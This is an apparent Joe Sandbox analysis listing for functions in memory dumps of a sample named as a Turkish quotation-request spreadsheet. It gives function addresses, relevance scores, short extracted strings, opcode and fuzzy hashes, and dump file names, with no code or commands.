Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12dea0264c4db5bd70ee13cdfa0d6e8cadeca83f4c92fafe6f6323eec98f08c1
Instruction ID: f4bfd7dbfeda36bb3bbd3af894f494b290272b65d6606fc74679e2b1a182da1d
Opcode Fuzzy Hash: 12dea0264c4db5bd70ee13cdfa0d6e8cadeca83f4c92fafe6f6323eec98f08c1
Instruction Fuzzy Hash: D851A774E00208DFEB19DFAAD494A9DBBB2FF89300F24C129E815AB365DB345842CF14

Function 013376F3 Relevance: 7.9, Strings: 6, Instructions: 448COMMON

Download Yara Rule

Strings

(oq, xrefs: 0133772E
(oq, xrefs: 01337BFF
(oq, xrefs: 013378B2
(oq, xrefs: 01337815
(oq, xrefs: 01337C0F
(oq, xrefs: 013377E9

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq
API String ID: 0-4267992933
Opcode ID: 80feac1a8a6c40c53dd4e2ee9815c91c6919ad5e21d114d1c5c1cc6a81fc35b8
Instruction ID: 27322d3fac6cf565a860f92e16336fb6038054379f0f4ded0870c635138ba1cc
Opcode Fuzzy Hash: 80feac1a8a6c40c53dd4e2ee9815c91c6919ad5e21d114d1c5c1cc6a81fc35b8
Instruction Fuzzy Hash: 45126A70A00249DFDB25CF69C884AAEBBF2FF88318F148559E9159B361D730ED41CB54

Function 01335362 Relevance: 6.4, Strings: 5, Instructions: 163COMMON

Download Yara Rule

Strings

PHq, xrefs: 013355C8
PHq, xrefs: 013355D9
LjMp, xrefs: 01335550
0oMp, xrefs: 013353E2
LjMp, xrefs: 01335566

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHq$PHq
API String ID: 0-3780208268
Opcode ID: 6203862095be61a3b365d2d3e31048ef1d9359af70a73a1b6ae79b9b120c19e6
Instruction ID: 12a1825bb6a455e98e6bcf77d1b2360d6211ddb7c1309230aa8f95e857c50600
Opcode Fuzzy Hash: 6203862095be61a3b365d2d3e31048ef1d9359af70a73a1b6ae79b9b120c19e6
Instruction Fuzzy Hash: D471C474E00218CFEB14DFA9D884A9DBBF2BF88304F158069E809AB361DB34A941CF54

Function 01338EF8 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

$q, xrefs: 01338FD7
$q, xrefs: 01338FB4

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 4f3002a4e1b3b4ca52ff2c0da5143fc66650e4dca66301339be2c20179d82b95
Instruction ID: cd74e343389b19c88463bff68f6ffdaf46478bdee59ec72a15cc92447eff99de
Opcode Fuzzy Hash: 4f3002a4e1b3b4ca52ff2c0da5143fc66650e4dca66301339be2c20179d82b95
Instruction Fuzzy Hash: 1F31B6303002158FDB369B6DE85463E7B6BFBC4718B1407DAF616CB296DB28CC448759

Function 01339D53 Relevance: 2.5, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

4'q, xrefs: 01339D84
4'q, xrefs: 01339D6D

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: b8e46423e087405634a6520ec68ff9f7a2929193821e76e157b079e243e4fea5
Instruction ID: cbf4babbaa1bf3f9baf1f911522eb11dd8771d4ed88211248433e38b8dd03c96
Opcode Fuzzy Hash: b8e46423e087405634a6520ec68ff9f7a2929193821e76e157b079e243e4fea5
Instruction Fuzzy Hash: 54018B353003056FD7191EAE6854A7ABBDBEFC8364B148469B949C7351DD71CC119790

Function 01330CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 01330F19

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 7a73baeb93620707143cd12197dc8337bbca1737dae2b964d5ecb8e04f9ab0f3
Instruction ID: e1a4d5d3fd1b01ae9f7ac38d392247ad4e2f8f1776681c81bb0550f972bb44b4
Opcode Fuzzy Hash: 7a73baeb93620707143cd12197dc8337bbca1737dae2b964d5ecb8e04f9ab0f3
Instruction Fuzzy Hash: FC52BA7890022ACFCB64EF65ED94B9DB7B6FB48305F1046A5E509AB358DB306D86CF40

Function 0133A4E0 Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

(oq, xrefs: 0133A518

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 4b6e350ec565b052e01f4876e4bd681cb40c09c5a100d1e779ee180a66e54f20
Instruction ID: 126884a6820a73e91065e05b4e2ece3bc4224ac9f89474dc278134f0f924c112
Opcode Fuzzy Hash: 4b6e350ec565b052e01f4876e4bd681cb40c09c5a100d1e779ee180a66e54f20
Instruction Fuzzy Hash: 3102B031600209CFDB15CFA8C684AAEBBF6BFC8309F158555E485DB2A5D730ED82CB59

Function 0133AA93 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

4'q, xrefs: 0133AB13

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: c3203480d416f137ed96ca43628f001c9cca4c397bfec754509087542e2fffb4
Instruction ID: ff2e1452a2251ca40c17ed1901e18f99c35e54808f57737ee073fba6845ee027
Opcode Fuzzy Hash: c3203480d416f137ed96ca43628f001c9cca4c397bfec754509087542e2fffb4
Instruction Fuzzy Hash: B34158716002198FDB19DF68D988AAA7BBAFF88715F100469F956CB3B1CB30DC50CB95

Function 0133AEF0 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

(oq, xrefs: 0133B079

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: dc4d963cdd2c3ff5a8228a4f3729ea21814496b190c1cea8746b2ca65dbc5485
Instruction ID: 7408416a465666d9112d91792bf7a86aa59ae5cb4568ba0eebea19a4872c8c49
Opcode Fuzzy Hash: dc4d963cdd2c3ff5a8228a4f3729ea21814496b190c1cea8746b2ca65dbc5485
Instruction Fuzzy Hash: 6631D272B042048FCB16AB78E8147AEBBF7AFC9714F18446AE516DB295CF318C05CB94

Function 0133E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20fb42b6f2dc315e78f5012fc93fb398f70636c5a2bf4ea7e4ad3d4dac6f3d2c
Instruction ID: 15a9c9135f42c6cd9927ad5505cc46838bb31a35337bc6be1a1c12f79c6cf7c1
Opcode Fuzzy Hash: 20fb42b6f2dc315e78f5012fc93fb398f70636c5a2bf4ea7e4ad3d4dac6f3d2c
Instruction Fuzzy Hash: 5B1297750253428FE7602F30E6AC12ABF7CFB0FB67B056C61E41FD1059AB3156899B62

Function 01335F38 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd93282ea4142644a59c43d6305912091cd56822c0a65ae79f1e6bbca3df2e52
Instruction ID: d9594af25629e4712eda4b4c9ca205429ef9fbe889538742739054bc5f2ffd29
Opcode Fuzzy Hash: cd93282ea4142644a59c43d6305912091cd56822c0a65ae79f1e6bbca3df2e52
Instruction Fuzzy Hash: D3B1CEB07042149FEB259F38D855B6E7BF6AFC9308F14452AE446CB3A6CB34C942C795

Function 0133A0F8 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486e6671988bd79d9331a82b2c3fc6ad73c26c2eabc7ec67aeeeb053cde7eabb
Instruction ID: c1879a6dd1bbda19adc1e1830efde7381a9a3f3098556f9db9d8bad6cb6157f7
Opcode Fuzzy Hash: 486e6671988bd79d9331a82b2c3fc6ad73c26c2eabc7ec67aeeeb053cde7eabb
Instruction Fuzzy Hash: 1791CB74A00209CFCB16CF98C4849DDBBF6FF88314F10856AE896EB225D735A955CB94

Function 013380D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d9c565e17ad234748abb284055a462648e4c751df3fadd6b563c34df01d22a
Instruction ID: e3095f711a5e6f3eacc84f68497a496fa56ebe261a1049764263f91de07b6d05
Opcode Fuzzy Hash: e8d9c565e17ad234748abb284055a462648e4c751df3fadd6b563c34df01d22a
Instruction Fuzzy Hash: 7B7139347006098FDB25DF6CC894AAA7BEAAF89708F1501A9F916DB371DB70DC41CB54

Function 01336498 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a70602a4f76f2bc17ebb4a3432fee6525cc88c6dc0569367a94ed95e0d78cf4
Instruction ID: e9b3928e71c7cf7eb54f8d72ed18b8e9ee02d61696f131dc242a3930a1b48497
Opcode Fuzzy Hash: 1a70602a4f76f2bc17ebb4a3432fee6525cc88c6dc0569367a94ed95e0d78cf4
Instruction Fuzzy Hash: FB71D2B0A00509EFDB14CF6DC48596DBBF6BFC9268B148169D502E7365D731E940CF64

Function 01334193 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee852780c52f857b3e88372bc8f1b94837202314ae626bfbad9956cf3529116
Instruction ID: dce3dee3320fcfac825f3d3d397a18d72c2f77c541a7ddf23f354213db8c4af3
Opcode Fuzzy Hash: 4ee852780c52f857b3e88372bc8f1b94837202314ae626bfbad9956cf3529116
Instruction Fuzzy Hash: 5751B375E01218CFCB08DFAAD49499DBBF6FF89314B209569E805AB364DB35A842CF10

Function 0133D553 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30d839c3907138a455bb7ecbaa9a0d6cb4492779fa02821eb7bacde090d0d15
Instruction ID: fc660fa299153b339817cd4cd3fec16ab5942bced60917ac3452147d4b4f0a7a
Opcode Fuzzy Hash: d30d839c3907138a455bb7ecbaa9a0d6cb4492779fa02821eb7bacde090d0d15
Instruction Fuzzy Hash: ED51A474E01218DFDB54DFA9D9949DDBBF2BF89310F248169E809AB365DB31A901CF10

Function 013341A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb72365a9e96c4c929a6b761e9ffe4ebfa658a28c6ae3ee388bf8f3092ddbca7
Instruction ID: b2cd8ef3f1e675b101b3c0ba479fed57d2060b007bc2bcf872f2550cd609bc66
Opcode Fuzzy Hash: eb72365a9e96c4c929a6b761e9ffe4ebfa658a28c6ae3ee388bf8f3092ddbca7
Instruction Fuzzy Hash: 2051A575E01318CFCB08DFAAD58499DBBF6FF89314B209569E805AB324DB31A842CF54

Function 0133F3F7 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a180de14bf06164c2d99b0c39a40c44092d37b718596ac0155b45a13ab302f30
Instruction ID: b293d1d39a77d97eb2903c450ff78eae2b529a66e140eca87a2016207d49950a
Opcode Fuzzy Hash: a180de14bf06164c2d99b0c39a40c44092d37b718596ac0155b45a13ab302f30
Instruction Fuzzy Hash: 0851E034D01318CFDB25DFA4D894AADBBB6FF89304F604169E806AB399DB355986CF40

Function 01335658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56016de14e887f93af5a7d6121998e3a2df8ee719ccdaff2d08b30f552cfd672
Instruction ID: 0ebd49d29b95bac9a1639d44a573ab8b246a53dfef27f66466af3fec5bc9826f
Opcode Fuzzy Hash: 56016de14e887f93af5a7d6121998e3a2df8ee719ccdaff2d08b30f552cfd672
Instruction Fuzzy Hash: B031AE31300209EFCF02AFA9D845AAF7BB6FB88715F104464F9159B249CB35C925DBA0

Function 01339C30 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f91bacb4fff605b89b2fe2cc8c3e4eb76c8cd282eef105dbb329f5257cc35be
Instruction ID: c29767020f29cbfad133c41c651b55427edb35622c6c67ae0746ce55fdfbbf6a
Opcode Fuzzy Hash: 8f91bacb4fff605b89b2fe2cc8c3e4eb76c8cd282eef105dbb329f5257cc35be
Instruction Fuzzy Hash: 0B313A30600349CFEB11CB68C888B6A7BEAEB8831DF548466E918CB256D7B1DC41CB95

Function 01338380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93ced9af91bcd393ee1a1a98dd73670e2430c953fde87f8d3621c6835b8b750
Instruction ID: 6bf2a9112c6affa92ded7375c685be8baa295ae871fe91efa63751d277c2dc5a
Opcode Fuzzy Hash: d93ced9af91bcd393ee1a1a98dd73670e2430c953fde87f8d3621c6835b8b750
Instruction Fuzzy Hash: FE21D3303042004BEB25566D845473E769BAFC470CF1481BDF506DBF9AEE35CC429389

Function 0133A3E3 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d382a06e5a63fd25537e0e21c7db81ab4654315ec295613f255cc803df42209b
Instruction ID: fd1de0cae495836e367182d6b407cf7d8b6753c804a56daca518cfba8c2ff8b4
Opcode Fuzzy Hash: d382a06e5a63fd25537e0e21c7db81ab4654315ec295613f255cc803df42209b
Instruction Fuzzy Hash: F331D1316002858FDB11CF28C888B5ABFF2AFC5314F048599E599EF3A2D334E800CB65

Function 01338373 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba42e04cb954dbfc1a7737622e74a23bfb08558b3cb1ab49e79772d491cdd1e
Instruction ID: d0f2c6ff197a68acb5f524211b9547153e8a14d0cc33919adc8fa2b43f169f22
Opcode Fuzzy Hash: 7ba42e04cb954dbfc1a7737622e74a23bfb08558b3cb1ab49e79772d491cdd1e
Instruction Fuzzy Hash: 1021D7303043104BDB26177D8954A3E7A9BAFC474CB1841BDF546EBB5AEE35C842D345

Function 013328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c47ebfc7c2c3dfe1b83ba1b53c1391e12639eab0ddf5957268bd8ed44a9f0f1
Instruction ID: d80b0826575dfcf2e06750cfb96adaaa67e9e7332ff8a729dcfd9b97acfced80
Opcode Fuzzy Hash: 1c47ebfc7c2c3dfe1b83ba1b53c1391e12639eab0ddf5957268bd8ed44a9f0f1
Instruction Fuzzy Hash: 1521A331A002149FCF15DF2CC450AAF7BB9EBD9364B608519E8499B258DB31EE42CBD5

Function 00EBD468 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3798335658.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ebd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5751c6c4c9c63d5c15e747bbcbfe2ae3660ca64eff186a8a87d6195754da43eb
Instruction ID: 1137e2cb4431405745ae0231df18687367780839aee8dd97542e9c9bb59afcb7
Opcode Fuzzy Hash: 5751c6c4c9c63d5c15e747bbcbfe2ae3660ca64eff186a8a87d6195754da43eb
Instruction Fuzzy Hash: 50210672508200EFDB15DF10D9C0B97BB65FB98318F248569E80A1B256D336D856CAA2

Function 01336300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a153530473925471ad2b714850af7a8b8a3604c26b5f2817d874e3675b8b78
Instruction ID: 4e0e7bef034c776fd0ba8e802de5754ee5822b36aceefbb44ef9ef260c25eac8
Opcode Fuzzy Hash: 10a153530473925471ad2b714850af7a8b8a3604c26b5f2817d874e3675b8b78
Instruction Fuzzy Hash: 992105353006109FD7259B29C455A2FB7A6FFC9B697144168E916DB7A8CF30DC028B84

Function 0133F3FF Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691a8e751c64fe823877d63e240dce05e2586e36aa9b5e144ea2826ad1bcb447
Instruction ID: 8083f08debfc83aae1e0649d39945654a5890eb479addf16c8fa9a5ea80a0800
Opcode Fuzzy Hash: 691a8e751c64fe823877d63e240dce05e2586e36aa9b5e144ea2826ad1bcb447
Instruction Fuzzy Hash: C3311270C01318DFEB14DFA9D444BEEBBB6AF89304F508429D815BB294DB785A4ACF51

Function 00ECD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3798569775.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ecd000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4b1789dfeb5547b31a87a255bc74999ec8faeb9fd595a8c6b119372869c6cb
Instruction ID: e6a608255674302c73681fa962a361cc3d59e8a940aa8203451e382d1d7c5bc1
Opcode Fuzzy Hash: 0d4b1789dfeb5547b31a87a255bc74999ec8faeb9fd595a8c6b119372869c6cb
Instruction Fuzzy Hash: 2E21CF71508204EFDB14DF28DA85F26BB66EB84318F24C56DE8495B292C737D847CA62

Function 01335649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c722c46cd5eba8834a1f54f2d27df72c0716a731f168789958a7c5ab316ed4f4
Instruction ID: a57c08244b75c53fdf65bc8b98df4bcea47511cafa6cae695e769365513be112
Opcode Fuzzy Hash: c722c46cd5eba8834a1f54f2d27df72c0716a731f168789958a7c5ab316ed4f4
Instruction Fuzzy Hash: FD2138317052488FCF02AF68E445AAF7BB6EF84724F1040A9F8158B359C734CD15CB90

Function 01334285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d15bed6ab3b7ef6f87cc23e23c3041b431a7deeedf8f8a13b93263dff3d16002
Instruction ID: d6b0bd4a9a99ba604269cf7b0a4f5d954a91004b1eb41b8bb5da70ce72f726aa
Opcode Fuzzy Hash: d15bed6ab3b7ef6f87cc23e23c3041b431a7deeedf8f8a13b93263dff3d16002
Instruction Fuzzy Hash: 5F31C478E01318CFCB44EFA9E58499DBBB6FF49314B209569E809AB324DB31AC41CF40

Function 01339761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac8f7fd436496c05be113a8da39a656d4145cdb2dbcb9abf3d9e5e66d84ac85
Instruction ID: 94b32e5d5e14984c4451bc93e338e2ac454fbb1f496f2ac68024ea00361ac706
Opcode Fuzzy Hash: 4ac8f7fd436496c05be113a8da39a656d4145cdb2dbcb9abf3d9e5e66d84ac85
Instruction Fuzzy Hash: B6216D30E01248DFEB15CFA6D550AEEBFB6AF88309F148059E415AA394DB30D941CF20

Function 013362F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b282dc9f925a93369d2f153bc8acef20f334cb15e663b9ba847a3038fdd350b9
Instruction ID: 38ee8f23aa72a4e905a195af8e2f3c8887a8899aea6951dcd93213c61ed022a8
Opcode Fuzzy Hash: b282dc9f925a93369d2f153bc8acef20f334cb15e663b9ba847a3038fdd350b9
Instruction Fuzzy Hash: 521106357056119FD7168B2DD85993EBBA6BFC576671840B9E906CB368CF30CC02CB90

Function 013327F0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2db6dd695c6a5ff7f42f94e2e8f1cea1c193b0cec619d1622f6ca9ca00654b
Instruction ID: b1fdb8a96103a88d40654d410b2489c17aac464dc57971bab002bac5a214c84f
Opcode Fuzzy Hash: cf2db6dd695c6a5ff7f42f94e2e8f1cea1c193b0cec619d1622f6ca9ca00654b
Instruction Fuzzy Hash: 5321D074C0520A8FCB10EFA9D8456EEBFF4EF4A314F10426AD805B2214E7355A85CBA1

Function 0133AEFB Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
